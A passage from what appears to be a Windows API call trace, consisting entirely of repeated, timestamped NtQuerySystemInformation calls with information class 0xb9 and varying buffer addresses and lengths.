SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0271.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0271.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0271.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x20, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 